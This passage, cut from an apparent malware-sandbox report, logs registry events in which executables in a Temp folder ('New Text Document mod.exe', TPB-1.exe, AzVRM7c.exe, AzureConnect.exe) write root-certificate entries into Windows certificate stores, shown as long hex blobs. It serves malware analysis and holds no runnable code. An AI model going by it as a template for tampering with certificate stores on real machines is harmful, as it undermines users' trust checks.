f301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
